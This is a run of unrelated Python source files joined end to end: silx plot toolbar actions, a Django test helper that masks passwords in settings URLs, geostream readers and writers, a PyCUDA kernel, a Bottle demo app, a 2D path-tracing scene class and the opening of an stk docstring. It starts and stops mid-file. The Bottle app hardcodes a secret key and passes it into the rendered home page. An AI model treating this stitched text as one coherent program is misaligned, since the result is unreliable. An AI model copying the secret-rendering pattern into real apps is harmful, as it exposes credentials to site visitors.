:class:`.PlotWidget`. :param plot: :class:`.PlotWidget` instance on which to operate :param parent: See :class:`QAction` """ def __init__(self, plot, parent=None): super(XAxisLogarithmicAction, self).__init__( plot, icon='plot-xlog', text='X Log. scale', tooltip='Logarithmic x-axis when checked', triggered=self._actionTriggered, checkable=True, parent=parent) self.axis = plot.getXAxis() self.setChecked(self.axis.getScale() == self.axis.LOGARITHMIC) self.axis.sigScaleChanged.connect(self._setCheckedIfLogScale) def _setCheckedIfLogScale(self, scale): self.setChecked(scale == self.axis.LOGARITHMIC) def _actionTriggered(self, checked=False): scale = self.axis.LOGARITHMIC if checked else self.axis.LINEAR self.axis.setScale(scale) class YAxisLogarithmicAction(PlotAction): """QAction controlling Y axis log scale on a :class:`.PlotWidget`. :param plot: :class:`.PlotWidget` instance on which to operate :param parent: See :class:`QAction` """ def __init__(self, plot, parent=None): super(YAxisLogarithmicAction, self).__init__( plot, icon='plot-ylog', text='Y Log. scale', tooltip='Logarithmic y-axis when checked', triggered=self._actionTriggered, checkable=True, parent=parent) self.axis = plot.getYAxis() self.setChecked(self.axis.getScale() == self.axis.LOGARITHMIC) self.axis.sigScaleChanged.connect(self._setCheckedIfLogScale) def _setCheckedIfLogScale(self, scale): self.setChecked(scale == self.axis.LOGARITHMIC) def _actionTriggered(self, checked=False): scale = self.axis.LOGARITHMIC if checked else self.axis.LINEAR self.axis.setScale(scale) class GridAction(PlotAction): """QAction controlling grid mode on a :class:`.PlotWidget`. :param plot: :class:`.PlotWidget` instance on which to operate :param str gridMode: The grid mode to use in 'both', 'major'. 
See :meth:`.PlotWidget.setGraphGrid` :param parent: See :class:`QAction` """ def __init__(self, plot, gridMode='both', parent=None): assert gridMode in ('both', 'major') self._gridMode = gridMode super(GridAction, self).__init__( plot, icon='plot-grid', text='Grid', tooltip='Toggle grid (on/off)', triggered=self._actionTriggered, checkable=True, parent=parent) self.setChecked(plot.getGraphGrid() is not None) plot.sigSetGraphGrid.connect(self._gridChanged) def _gridChanged(self, which): """Slot listening for PlotWidget grid mode change.""" self.setChecked(which != 'None') def _actionTriggered(self, checked=False): self.plot.setGraphGrid(self._gridMode if checked else None) class CurveStyleAction(PlotAction): """QAction controlling curve style on a :class:`.PlotWidget`. It changes the default line and markers style which updates all curves on the plot. :param plot: :class:`.PlotWidget` instance on which to operate :param parent: See :class:`QAction` """ def __init__(self, plot, parent=None): super(CurveStyleAction, self).__init__( plot, icon='plot-toggle-points', text='Curve style', tooltip='Change curve line and markers style', triggered=self._actionTriggered, checkable=False, parent=parent) def _actionTriggered(self, checked=False): currentState = (self.plot.isDefaultPlotLines(), self.plot.isDefaultPlotPoints()) if currentState == (False, False): newState = True, False else: # line only, line and symbol, symbol only states = (True, False), (True, True), (False, True) newState = states[(states.index(currentState) + 1) % 3] self.plot.setDefaultPlotLines(newState[0]) self.plot.setDefaultPlotPoints(newState[1]) class ColormapAction(PlotAction): """QAction opening a ColormapDialog to update the colormap. Both the active image colormap and the default colormap are updated. 
    :param plot: :class:`.PlotWidget` instance on which to operate
    :param parent: See :class:`QAction`
    """

    def __init__(self, plot, parent=None):
        self._dialog = None  # To store an instance of ColormapDialog
        super(ColormapAction, self).__init__(
            plot,
            icon='colormap',
            text='Colormap',
            tooltip="Change colormap",
            triggered=self._actionTriggered,
            checkable=True,
            parent=parent)
        self.plot.sigActiveImageChanged.connect(self._updateColormap)
        self.plot.sigActiveScatterChanged.connect(self._updateColormap)

    def setColorDialog(self, colorDialog):
        """Set a specific color dialog instead of using the default one."""
        assert colorDialog is not None
        assert self._dialog is None
        self._dialog = colorDialog
        self._dialog.visibleChanged.connect(self._dialogVisibleChanged)
        self.setChecked(self._dialog.isVisible())

    @staticmethod
    def _createDialog(parent):
        """Create the dialog if not already existing.

        :param QWidget parent: Parent of the new colormap dialog
        :rtype: ColormapDialog
        """
        from silx.gui.dialog.ColormapDialog import ColormapDialog
        dialog = ColormapDialog(parent=parent)
        dialog.setModal(False)
        return dialog

    def _actionTriggered(self, checked=False):
        """Create a colormap dialog and update the active image and default colormap."""
        if self._dialog is None:
            self._dialog = self._createDialog(self.plot)
            self._dialog.visibleChanged.connect(self._dialogVisibleChanged)

        # Run the dialog listening to colormap change
        if checked:
            self._updateColormap()
            self._dialog.show()
        else:
            self._dialog.hide()

    def _dialogVisibleChanged(self, isVisible):
        self.setChecked(isVisible)

    def _updateColormap(self):
        if self._dialog is None:
            return
        image = self.plot.getActiveImage()

        if isinstance(image, items.ImageComplexData):
            # Specific init for complex images
            colormap = image.getColormap()

            mode = image.getComplexMode()
            if mode in (items.ImageComplexData.ComplexMode.AMPLITUDE_PHASE,
                        items.ImageComplexData.ComplexMode.LOG10_AMPLITUDE_PHASE):
                data = image.getData(
                    copy=False,
                    mode=items.ImageComplexData.ComplexMode.PHASE)
            else:
                data = image.getData(copy=False)

            # Set histogram and range if any
            self._dialog.setData(data)

        elif isinstance(image, items.ColormapMixIn):
            # Set dialog from active image
            colormap = image.getColormap()
            # Set histogram and range if any
            self._dialog.setItem(image)

        else:
            # No active image or active image is RGBA,
            # check for an active scatter plot
            scatter = self.plot._getActiveItem(kind='scatter')
            if scatter is not None:
                colormap = scatter.getColormap()
                self._dialog.setItem(scatter)
            else:
                # No active data image nor scatter,
                # set dialog from default info
                colormap = self.plot.getDefaultColormap()
                # Reset histogram and range if any
                self._dialog.setData(None)

        self._dialog.setColormap(colormap)


class ColorBarAction(PlotAction):
    """QAction opening the ColorBarWidget of the specified plot.

    :param plot: :class:`.PlotWidget` instance on which to operate
    :param parent: See :class:`QAction`
    """

    def __init__(self, plot, parent=None):
        self._dialog = None  # To store an instance of ColorBar
        super(ColorBarAction, self).__init__(
            plot,
            icon='colorbar',
            text='Colorbar',
            tooltip="Show/Hide the colorbar",
            triggered=self._actionTriggered,
            checkable=True,
            parent=parent)
        colorBarWidget = self.plot.getColorBarWidget()
        old = self.blockSignals(True)
        self.setChecked(colorBarWidget.isVisibleTo(self.plot))
        self.blockSignals(old)
        colorBarWidget.sigVisibleChanged.connect(self._widgetVisibleChanged)

    def _widgetVisibleChanged(self, isVisible):
        """Callback when the colorbar `visible` property changes."""
        if self.isChecked() == isVisible:
            return
        self.setChecked(isVisible)

    def _actionTriggered(self, checked=False):
        """Show or hide the colorbar widget of the plot."""
        colorBarWidget = self.plot.getColorBarWidget()
        if colorBarWidget.isHidden() != checked:
            # The widget is already in the requested state
            return
        self.plot.getColorBarWidget().setVisible(checked)


class KeepAspectRatioAction(PlotAction):
    """QAction controlling aspect ratio on a :class:`.PlotWidget`.

    :param plot: :class:`.PlotWidget` instance on which to operate
    :param parent: See :class:`QAction`
    """

    def __init__(self, plot, parent=None):
        # Uses two images for checked/unchecked states
        self._states = {
            False: (icons.getQIcon('shape-circle-solid'),
                    "Keep data aspect ratio"),
            True: (icons.getQIcon('shape-ellipse-solid'),
                   "Do not keep data aspect ratio"),
        }

        icon, tooltip = self._states[plot.isKeepDataAspectRatio()]
        super(KeepAspectRatioAction, self).__init__(
            plot,
            icon=icon,
            text='Toggle keep aspect ratio',
            tooltip=tooltip,
            triggered=self._actionTriggered,
            checkable=False,
            parent=parent)
        plot.sigSetKeepDataAspectRatio.connect(
            self._keepDataAspectRatioChanged)

    def _keepDataAspectRatioChanged(self, aspectRatio):
        """Handle the plot's keep-data-aspect-ratio signal."""
        icon, tooltip = self._states[aspectRatio]
        self.setIcon(icon)
        self.setToolTip(tooltip)

    def _actionTriggered(self, checked=False):
        # This will trigger _keepDataAspectRatioChanged
        self.plot.setKeepDataAspectRatio(
            not self.plot.isKeepDataAspectRatio())


class YAxisInvertedAction(PlotAction):
    """QAction controlling Y orientation on a :class:`.PlotWidget`.

    :param plot: :class:`.PlotWidget` instance on which to operate
    :param parent: See :class:`QAction`
    """

    def __init__(self, plot, parent=None):
        # Uses two images for checked/unchecked states
        self._states = {
            False: (icons.getQIcon('plot-ydown'),
                    "Orient Y axis downward"),
            True: (icons.getQIcon('plot-yup'),
                   "Orient Y axis upward"),
        }

        icon, tooltip = self._states[plot.getYAxis().isInverted()]
        super(YAxisInvertedAction, self).__init__(
            plot,
            icon=icon,
            text='Invert Y Axis',
            tooltip=tooltip,
            triggered=self._actionTriggered,
            checkable=False,
            parent=parent)
        plot.getYAxis().sigInvertedChanged.connect(self._yAxisInvertedChanged)

    def _yAxisInvertedChanged(self, inverted):
        """Handle the plot's y-axis-inverted signal."""
        icon, tooltip = self._states[inverted]
        self.setIcon(icon)
        self.setToolTip(tooltip)

    def _actionTriggered(self, checked=False):
        # This will trigger _yAxisInvertedChanged
        yAxis = self.plot.getYAxis()
        yAxis.setInverted(not yAxis.isInverted())


class CrosshairAction(PlotAction):
    """QAction toggling crosshair cursor on a :class:`.PlotWidget`.

    :param plot: :class:`.PlotWidget` instance on which to operate
    :param str color: Color to use to draw the crosshair
    :param int linewidth: Width of the crosshair cursor
    :param str linestyle: Style of line.
        See :meth:`.Plot.setGraphCursor`
    :param parent: See :class:`QAction`
    """

    def __init__(self, plot, color='black', linewidth=1, linestyle='-',
                 parent=None):
        self.color = color
        """Color used to draw the crosshair (str)."""

        self.linewidth = linewidth
        """Width of the crosshair cursor (int)."""

        self.linestyle = linestyle
        """Style of line of the cursor (str)."""

        super(CrosshairAction, self).__init__(
            plot,
            icon='crosshair',
            text='Crosshair Cursor',
            tooltip='Enable crosshair cursor when checked',
            triggered=self._actionTriggered,
            checkable=True,
            parent=parent)
        self.setChecked(plot.getGraphCursor() is not None)
        plot.sigSetGraphCursor.connect(self.setChecked)

    def _actionTriggered(self, checked=False):
        self.plot.setGraphCursor(checked,
                                 color=self.color,
                                 linestyle=self.linestyle,
                                 linewidth=self.linewidth)


class PanWithArrowKeysAction(PlotAction):
    """QAction toggling pan with arrow keys on a :class:`.PlotWidget`.

    :param plot: :class:`.PlotWidget` instance on which to operate
    :param parent: See :class:`QAction`
    """

    def __init__(self, plot, parent=None):
        super(PanWithArrowKeysAction, self).__init__(
            plot,
            icon='arrow-keys',
            text='Pan with arrow keys',
            tooltip='Enable pan with arrow keys when checked',
            triggered=self._actionTriggered,
            checkable=True,
            parent=parent)
        self.setChecked(plot.isPanWithArrowKeys())
        plot.sigSetPanWithArrowKeys.connect(self.setChecked)

    def _actionTriggered(self, checked=False):
        self.plot.setPanWithArrowKeys(checked)


class ShowAxisAction(PlotAction):
    """QAction controlling axis visibility on a :class:`.PlotWidget`.

    :param plot: :class:`.PlotWidget` instance on which to operate
    :param parent: See :class:`QAction`
    """

    def __init__(self, plot, parent=None):
        tooltip = 'Show plot axis when checked, otherwise hide them'
        PlotAction.__init__(self,
                            plot,
                            icon='axis',
                            text='show axis',
                            tooltip=tooltip,
                            triggered=self._actionTriggered,
                            checkable=True,
                            parent=parent)
        self.setChecked(self.plot._backend.isAxesDisplayed())
        plot._sigAxesVisibilityChanged.connect(self.setChecked)

    def _actionTriggered(self, checked=False):
        self.plot.setAxesDisplayed(checked)
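# Hedged usage sketch, not part of the original silx module: one way these
# actions might be attached to a toolbar. Assumes silx and a Qt binding are
# installed; PlotWidget is a QMainWindow subclass, so addToolBar() should be
# available, but details may need adjusting to the installed silx version.
if __name__ == '__main__':
    from silx.gui import qt
    from silx.gui.plot import PlotWidget

    app = qt.QApplication([])
    plot = PlotWidget()
    toolbar = qt.QToolBar(plot)
    for actionClass in (ColormapAction, ColorBarAction,
                        KeepAspectRatioAction, YAxisInvertedAction,
                        CrosshairAction, PanWithArrowKeysAction,
                        ShowAxisAction):
        toolbar.addAction(actionClass(plot, parent=toolbar))
    plot.addToolBar(toolbar)
    plot.show()
    app.exec_()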
from tests.fixtures import * # noqa: F401
# coding: utf-8

import logging
import re
from itertools import chain
from textwrap import TextWrapper

from django.core import mail
from django.test import TestCase as DjangoTestCase
from django.views import debug
from six import string_types
from six.moves.urllib.parse import urlparse, urlunparse
from threadlocals.threadlocals import set_thread_variable

from .celery import app as celery_app

# patch the default formatter to use a unicode format string
logging._defaultFormatter = logging.Formatter("%(message)s")
logger = logging.getLogger(__name__)
HIDDEN_SETTING = re.compile(r"URL|BACKEND")


class TestCase(DjangoTestCase):
    """
    Overrides the default Django TestCase to clear out the threadlocal
    request variable during class setUp and tearDown.
    """

    @classmethod
    def setUpClass(cls):
        super(TestCase, cls).setUpClass()
        set_thread_variable("request", None)

    @classmethod
    def tearDownClass(cls):
        set_thread_variable("request", None)
        super(TestCase, cls).tearDownClass()

    def setUp(self):
        super(TestCase, self).setUp()
        set_thread_variable("request", None)

    def tearDown(self):
        set_thread_variable("request", None)
        super(TestCase, self).tearDown()


def monkey_patch_cleanse_setting():
    # monkey-patch django.views.debug.cleanse_setting to check for
    # CELERY_RESULT_BACKEND
    _cleanse_setting = debug.cleanse_setting

    def cleanse_setting(key, value):
        cleansed = _cleanse_setting(key, value)
        if HIDDEN_SETTING.search(key):
            try:
                parsed = None
                if isinstance(value, string_types):
                    parsed = urlparse(value)
                if parsed and parsed.password:
                    # urlparse returns a read-only tuple, use a list to
                    # rewrite parts
                    parsed_list = list(parsed)
                    parsed_list[1] = parsed.netloc.replace(
                        f":{parsed.password}", ":**********", 1
                    )
                    # put Humpty Dumpty back together again
                    cleansed = urlunparse(parsed_list)
            except Exception:
                logger.exception("Exception cleansing URLs for error reporting")
        return cleansed

    debug.cleanse_setting = cleanse_setting


def monkey_patch_mail_admins():
    # monkey-patch django.core.mail.mail_admins to properly wrap long lines
    _mail_admins = mail.mail_admins

    def mail_admins(subject, message, *args, **kwargs):
        """
        Wraps the mail_admins function from Django to wrap long lines in
        emails. The exim mail server used in EDD disallows lines longer
        than 998 bytes.
        """
        wrapper = TextWrapper(
            width=79,
            break_on_hyphens=False,
            replace_whitespace=False,
            subsequent_indent=" ",
        )
        message = "\n".join(
            chain(*(wrapper.wrap(line) for line in message.splitlines()))
        )
        _mail_admins(subject, message, *args, **kwargs)

    mail.mail_admins = mail_admins


monkey_patch_cleanse_setting()
monkey_patch_mail_admins()

__all__ = ("celery_app", "TestCase")
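# Hedged, standalone demonstration of the masking idea used in
# monkey_patch_cleanse_setting() above (no Django required). The sample URL
# is illustrative, not taken from any real configuration.
if __name__ == "__main__":
    from urllib.parse import urlparse as _urlparse, urlunparse as _urlunparse

    value = "redis://edduser:s3cret@localhost:6379/0"
    parsed = _urlparse(value)
    if parsed.password:
        # urlparse returns a read-only tuple; rewrite the netloc via a list
        parts = list(parsed)
        parts[1] = parsed.netloc.replace(f":{parsed.password}", ":**********", 1)
        value = _urlunparse(parts)
    print(value)  # -> redis://edduser:**********@localhost:6379/0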
# repo: granular-oss/geostream, file: geostream/v3.py
import gzip
import typing as typ

import simplejson as json

from geostream.base import (
    Feature,
    GeoStreamReader,
    GeoStreamReverseReader,
    GeoStreamWriter,
    Properties,
)


class GeoStreamReaderV3(GeoStreamReader):
    """
    Stream header accessors and iterator over a readable binary stream
    of compressed GeoJSON Features
    """

    GEOSTREAM_SCHEMA_VERSION = 3

    def _load_properties(self, buffer: bytes) -> Properties:
        return json.loads(buffer)

    def _load_feature(self, data: bytes) -> Feature:
        return self._construct_feature(
            json.loads(gzip.decompress(data).decode())
        )


class GeoStreamReverseReaderV3(GeoStreamReverseReader):
    """
    Stream header accessors and backwards iterator over a readable binary
    stream of compressed GeoJSON Features
    """

    GEOSTREAM_SCHEMA_VERSION = 3

    def _load_properties(self, buffer: bytes) -> Properties:
        return json.loads(buffer)

    def _load_feature(self, data: bytes) -> Feature:
        return self._construct_feature(
            json.loads(gzip.decompress(data).decode())
        )


class GeoStreamWriterV3(GeoStreamWriter):
    """
    Binary stream writer provides methods to write a header followed by
    compressed GeoJSON Features
    """

    GEOSTREAM_SCHEMA_VERSION: int = 3

    def _dump_properties(self, properties: Properties) -> typ.Optional[bytes]:
        if properties is not None:
            return json.dumps(properties).encode()
        else:
            return None

    def _dump_feature(self, feature: Feature) -> bytes:
        feature.wkb  # Validity check
        return gzip.compress(json.dumps(feature).encode())
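# Hedged sketch, not part of the original geostream module: the per-feature
# codec used above is plain "JSON then gzip", which can be exercised with the
# standard library alone. A dict stands in for a Feature here.
if __name__ == "__main__":
    import json as stdlib_json

    feature_dict = {"type": "Feature", "geometry": None, "properties": {"a": 1}}
    blob = gzip.compress(stdlib_json.dumps(feature_dict).encode())
    assert stdlib_json.loads(gzip.decompress(blob).decode()) == feature_dict
    print(f"round-trip OK, compressed size {len(blob)} bytes")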
from __future__ import division
import numpy as np
import pycuda.driver as drv
from pycuda.compiler import SourceModule
import pycuda.autoinit

kernel_code_div_eigenenergy_cuda = """
#include <stdio.h>
#include <stdlib.h>

__global__ void calc_XXVV_gpu(float *nm2v_re, float *nm2v_im,
        int nm2v_dim1, int nm2v_dim2,
        float *ksn2e, float *ksn2f, int nfermi, int vstart, int ksn2e_dim,
        double omega_re, double omega_im)
{
    int i = blockIdx.x * blockDim.x + threadIdx.x;  // nocc
    int j = blockIdx.y * blockDim.y + threadIdx.y;  // nvirt

    int m, index;
    float en, em, fn, fm;
    double alpha, beta, a, b, old_re;

    if (i < nfermi)
    {
        en = ksn2e[i];
        fn = ksn2f[i];
        if (j < ksn2e_dim - i - 1)
        {
            m = j + i + 1 - vstart;
            if (m > 0)
            {
                em = ksn2e[i + 1 + j];
                fm = ksn2f[i + 1 + j];

                a = (omega_re - (em - en))*(omega_re - (em - en)) + omega_im*omega_im;
                b = (omega_re + (em - en))*(omega_re + (em - en)) + omega_im*omega_im;

                alpha = (b*(omega_re - (em - en)) - a*(omega_re + (em - en)))/(a*b);
                beta = omega_im*(a - b)/(a*b);

                index = i*nm2v_dim2 + m;
                // cache the original real part: both updates below must use
                // the value from before the overwrite (the original code
                // read nm2v_re[index] again after writing it)
                old_re = nm2v_re[index];
                nm2v_re[index] = (fn - fm) * (old_re*alpha - nm2v_im[index]*beta);
                nm2v_im[index] = (fn - fm) * (old_re*beta + nm2v_im[index]*alpha);
            }
        }
    }
}
"""


def div_eigenenergy_cuda(ksn2e, ksn2f, nfermi, vstart, comega, nm2v_re,
                         nm2v_im, block_size, grid_size):
    block = (int(block_size[0]), int(block_size[1]), 1)
    grid = (int(grid_size[0]), int(grid_size[1]))

    mod = SourceModule(kernel_code_div_eigenenergy_cuda)
    calc_XXVV = mod.get_function("calc_XXVV_gpu")

    calc_XXVV(nm2v_re, nm2v_im,
              np.int32(nm2v_re.shape[0]),
              np.int32(nm2v_re.shape[1]),
              ksn2e, ksn2f,
              np.int32(nfermi), np.int32(vstart),
              np.int32(ksn2e.shape[0]),
              np.float64(comega.real), np.float64(comega.imag),
              block=block, grid=grid)
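# Hedged CPU cross-check, not part of the original module: the kernel above
# multiplies each (occupied n, virtual m) element by
# (fn - fm) * (1/(omega - (em - en)) - 1/(omega + (em - en))), whose real and
# imaginary parts are exactly the kernel's alpha and beta. A plain NumPy
# reference, useful for validating the GPU result on small inputs:
def div_eigenenergy_numpy_reference(ksn2e, ksn2f, nfermi, vstart, comega,
                                    nm2v_re, nm2v_im):
    for n in range(nfermi):
        en, fn = ksn2e[n], ksn2f[n]
        for j in range(len(ksn2e) - n - 1):
            m = j + n + 1 - vstart
            if m <= 0:
                continue
            em, fm = ksn2e[n + 1 + j], ksn2f[n + 1 + j]
            z = nm2v_re[n, m] + 1j * nm2v_im[n, m]
            z = (fn - fm) * z * (1.0 / (comega - (em - en))
                                 - 1.0 / (comega + (em - en)))
            nm2v_re[n, m], nm2v_im[n, m] = z.real, z.imag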
""" Routes and views for the bottle application. """ import os import json from bottle import route, view, static_file from datetime import datetime config = { "secret_key" : "my developer secret value" } if os.getenv("MY_CONFIG"): # you can define the setting in your Azure Web App # by setting "MY_CONFIG" in the Appsettings. config = json.loads(os.getenv("MY_CONFIG")) @route('/static/<filepath:path>') def server_static(filepath): """Handler for static files, used with the development server. When running under a production server such as IIS or Apache, the server should be configured to serve the static files.""" return static_file(filepath, root="static/") @route('/') @route('/home') @view('index') def home(): """Renders the home page.""" return dict( year=datetime.now().year, secret = config.get("secret_key") ) @route('/contact') @view('contact') def contact(): """Renders the contact page.""" return dict( title='Contact', message='Your contact page.', year=datetime.now().year ) @route('/about') @view('about') def about(): """Renders the about page.""" return dict( title='About', message='Your application description page.', year=datetime.now().year )
import numpy as np

import manifolds
from manifolds import Scene as CppScene
from manifolds import Ray2f, Shape
from misc import *
from path import Path
from draw import *


class Scene:
    def __init__(self, shapes):
        self.shapes = shapes

        self.offset = [0, 0]
        self.zoom = 1.0
        self.scale = 1.0

        self.start_u_default = 0
        self.start_u_current = 0
        self.start_angle_default = 0
        self.start_angle_current = 0
        self.end_u_default = 0
        self.end_u_current = 0
        self.spec_u_default = 0
        self.spec_u_current = 0
        self.n_bounces_default = 1

        self.cpp_scene = CppScene()
        shape_id = 0
        for s in shapes:
            s.id = shape_id
            self.cpp_scene.add_shape(s)
            shape_id += 1

    def set_start(self, start_u, start_angle, end_u=0.5, spec_u=0.5):
        self.start_u_default = start_u
        self.start_angle_default = start_angle
        self.end_u_default = end_u
        self.spec_u_default = spec_u

        self.start_u_current = start_u
        self.start_angle_current = start_angle
        self.end_u_current = end_u
        self.spec_u_current = spec_u

    def start_shape(self):
        return self.cpp_scene.start_shape()

    def end_shape(self):
        return self.cpp_scene.end_shape()

    def first_specular_shape(self):
        return self.cpp_scene.first_specular_shape()

    def draw(self, ctx):
        for shape in self.shapes:
            if shape.type == Shape.Type.Emitter:
                for t in np.linspace(0, 1, 10):
                    it = shape.sample_position(t)
                    draw_arrow(ctx, it.p, it.n, nvg.RGB(255, 255, 180),
                               scale=0.5, length=0.03)
        self.cpp_scene.draw(ctx)

    def ray_intersect(self, ray):
        # Trace ray against C++ representation
        it = self.cpp_scene.ray_intersect(ray)
        if it.is_valid():
            # We now need to track the relative IOR change at this interaction
            it.eta = it.shape.eta
            it.n_offset = np.array([0, 1])
        return it

    def sample_start_position(self, u):
        it = self.cpp_scene.start_shape().sample_position(u)
        it.eta = it.shape.eta
        it.n_offset = np.array([0, 1])
        return it

    def sample_end_position(self, u):
        it = self.cpp_scene.end_shape().sample_position(u)
        it.eta = it.shape.eta
        it.n_offset = np.array([0, 1])
        return it

    def sample_spec_position(self, u):
        it = self.cpp_scene.first_specular_shape().sample_position(u)
        it.eta = it.shape.eta
        it.n_offset = np.array([0, 1])
        return it

    def sample_path(self):
        it = self.sample_start_position(self.start_u_current)
        path = Path()
        path.append(it)

        theta = np.radians(self.start_angle_current)
        wo = [np.cos(theta), np.sin(theta)]
        if wo @ it.n < 0.0:
            return path

        while True:
            ray = Ray2f(it.p, wo)
            it = self.ray_intersect(ray)
            wi = -ray.d
            path.append(it)

            m = it.s * it.n_offset[0] + it.n * it.n_offset[1]
            if it.shape.type == Shape.Type.Reflection:
                if wi @ it.n < 0:
                    break
                wo = reflect(wi, m)
            elif it.shape.type == Shape.Type.Refraction:
                wo = refract(wi, m, it.shape.eta)
            else:
                break

            if not wo[0]:
                break
            wo = wo[1]

        return path

    def sample_seed_path(self, n_spec_bounces=1):
        path = Path()

        it1 = self.sample_start_position(self.start_u_current)
        it2 = self.sample_spec_position(self.spec_u_current)
        wo = normalize(it2.p - it1.p)
        if wo @ it1.n < 0.0:
            return path

        ray = Ray2f(it1.p, wo)
        it = self.ray_intersect(ray)
        if not it.is_valid() or (it.shape != it2.shape):
            return path
        it2 = it

        path.append(it1)
        path.append(it)

        while True:
            wi = -wo
            if len(path) - 1 >= n_spec_bounces:
                break

            m = it.s * it.n_offset[0] + it.n * it.n_offset[1]
            if it.shape.type == Shape.Type.Reflection:
                if wi @ it.n < 0:
                    break
                wo = reflect(wi, m)
            elif it.shape.type == Shape.Type.Refraction:
                wo = refract(wi, m, it.shape.eta)
            else:
                print("Should not happen!!")
                break

            if not wo[0]:
                break
            wo = wo[1]

            ray = Ray2f(it.p, wo)
            it = self.ray_intersect(ray)
            if not (it.shape.type == Shape.Type.Reflection or
                    it.shape.type == Shape.Type.Refraction):
                break
            path.append(it)

        it3 = self.sample_end_position(self.end_u_current)
        path.append(it3)

        if len(path) != n_spec_bounces + 2:
            return Path()
        return path

    def sample_mnee_seed_path(self):
        path = Path()

        it1 = self.sample_start_position(self.start_u_current)
        it3 = self.sample_end_position(self.end_u_current)
        wo = normalize(it3.p - it1.p)
        if wo @ it1.n < 0.0:
            return path
        path.append(it1)

        it = it1
        while True:
            ray = Ray2f(it.p, wo)
            it = self.ray_intersect(ray)
            if it.shape.type == Shape.Type.Reflection:
                break
            elif it.shape.type == Shape.Type.Refraction:
                pass
            else:
                break
            path.append(it)

        it3 = self.sample_end_position(self.end_u_current)
        path.append(it3)
        return path

    def reproject_path_me(self, offset_vertices):
        path = Path()

        p0 = offset_vertices[0]
        t0 = self.cpp_scene.start_shape().project(p0)
        it = self.cpp_scene.start_shape().sample_position(t0)
        path.append(it)

        p1 = offset_vertices[1]
        wo = normalize(p1 - p0)

        while True:
            ray = Ray2f(it.p, wo)
            it = self.ray_intersect(ray)
            wi = -ray.d
            path.append(it)

            m = it.s * it.n_offset[0] + it.n * it.n_offset[1]
            if it.shape.type == Shape.Type.Reflection:
                if wi @ it.n < 0:
                    break
                wo = reflect(wi, m)
            elif it.shape.type == Shape.Type.Refraction:
                wo = refract(wi, m, it.shape.eta)
            else:
                break

            if not wo[0]:
                break
            wo = wo[1]

        return path

    def reproject_path_sms(self, offset_vertices, previous_path,
                           n_spec_bounces=1):
        path = Path()

        p1 = offset_vertices[0]
        t1 = self.cpp_scene.start_shape().project(p1)
        it1 = self.cpp_scene.start_shape().sample_position(t1)

        p2 = offset_vertices[1]
        wo = normalize(p2 - p1)
        if wo @ it1.n < 0.0:
            return path

        ray = Ray2f(p1, wo)
        it2 = self.ray_intersect(ray)
        if it2.shape.id != self.cpp_scene.first_specular_shape().id:
            return path
        it2.n_offset = previous_path.vertices[1].n_offset

        path.append(it1)
        path.append(it2)

        it = it2
        while True:
            wi = -wo
            if len(path) - 1 >= n_spec_bounces:
                break

            m = it.s * it.n_offset[0] + it.n * it.n_offset[1]
            if it.shape.type == Shape.Type.Reflection:
                if wi @ it.n < 0:
                    break
                wo = reflect(wi, m)
            elif it.shape.type == Shape.Type.Refraction:
                wo = refract(wi, m, it.shape.eta)
            else:
                print("Should not happen!!")
                break

            if not wo[0]:
                break
            wo = wo[1]

            ray = Ray2f(it.p, wo)
            it = self.ray_intersect(ray)
            if not (it.shape.type == Shape.Type.Reflection or
                    it.shape.type == Shape.Type.Refraction):
                break
            if len(path) > len(previous_path):
                break
            it.n_offset = previous_path.vertices[len(path)].n_offset
            path.append(it)

        it3 = self.sample_end_position(self.end_u_current)
        path.append(it3)

        if len(path) != n_spec_bounces + 2:
            return Path()
        return path
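# Hedged sketch, not the actual misc.py: the loops above use reflect() and
# refract() helpers that appear to return a (success, direction) pair. Under
# that assumed convention (wi pointing away from the surface, m the shading
# normal, eta the relative index of refraction), consistent 2D versions
# might look like this:
def _reflect_sketch(wi, m):
    wi, m = np.asarray(wi, dtype=float), np.asarray(m, dtype=float)
    return True, 2.0 * (wi @ m) * m - wi


def _refract_sketch(wi, m, eta):
    wi, m = np.asarray(wi, dtype=float), np.asarray(m, dtype=float)
    cos_i = wi @ m
    if cos_i < 0.0:
        # hitting the surface from the inside: flip the normal and IOR
        m, cos_i, eta = -m, -cos_i, 1.0 / eta
    sin2_t = (1.0 - cos_i * cos_i) / (eta * eta)
    if sin2_t > 1.0:
        return False, None  # total internal reflection
    cos_t = np.sqrt(1.0 - sin2_t)
    return True, -wi / eta + (cos_i / eta - cos_t) * m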
# repo: stevenbennett96/stk
# file: src/stk/molecular/topology_graphs/topology_graph/topology_graph/topology_graph.py
"""
Topology Graph
==============

"""

from __future__ import annotations

import typing
from collections import abc
from functools import partial

import numpy as np

from stk.utilities import flatten

from ....molecules import BuildingBlock
from ....reactions import ReactionFactory
from ..construction_result import ConstructionResult
from ..construction_state import ConstructionState
from ..edge import Edge
from ..edge_group import EdgeGroup
from ..optimizers import Optimizer
from ..vertex import Vertex
from .implementations import (
    _Parallel,
    _Serial,
    _TopologyGraphImplementation,
)

_TopologyGraphT = typing.TypeVar(
    '_TopologyGraphT',
    bound='TopologyGraph',
)


class TopologyGraph:
    """
    An abstract base class for topology graphs.

    It is responsible for the construction of molecules. To create a new
    topology graph, you want to subclass and implement this abstract
    base class.

    Notes:

        *Adding New Topology Graphs*

        You might notice that some of the methods of this abstract base
        class are implemented. This is purely for convenience when
        implementing subclasses. The implemented public methods are
        simply default implementations, which can safely be ignored or
        overridden, when implementing subclasses. Any private methods
        are implementation details of these default implementations.

        Many classes, such as :class:`.Vertex`, :class:`.Edge`,
        :class:`.EdgeGroup` and :class:`.ConstructionState`, exist as
        implementation details of this default :class:`.TopologyGraph`
        implementation. You could ignore all of them, and define a new
        :meth:`.construct` method from scratch. In fact, your topology
        graph does not have to be represented as a graph at all.
        However, using the default implementation of
        :class:`.TopologyGraph` makes it significantly easier to
        implement a construction process. When using the default
        implementation of :class:`.TopologyGraph`, you mostly just need
        to implement a :class:`.Vertex` subclass, which is much easier
        than figuring out the whole construction process from scratch.
        In addition, you get benefits like parallel construction for
        free, as it is included in the default implementation.

        Typically, adding a new topology graph will involve
        implementing any pure virtual methods of
        :class:`.TopologyGraph`, in a new subclass, as well as
        implementing any pure virtual methods of :class:`.Vertex`,
        again in a new subclass. Combined, this is just a handful of
        simple methods to implement. Sometimes, rarely, you might also
        want to subclass :class:`.ConstructionState`, when you want to
        add additional hooks during construction, by extending the
        methods of this class. If you do this, make sure to override
        :meth:`._get_construction_state` to return your subclass of
        :class:`.ConstructionState`, rather than the base class, as is
        done by default. You can subclass and extend the methods of any
        class as you wish, but it would be unusual if this doesn't
        cover all your requirements.

        *The Default Implementation*

        The default implementation of :class:`.TopologyGraph`
        represents the constructed molecule through a graph. The
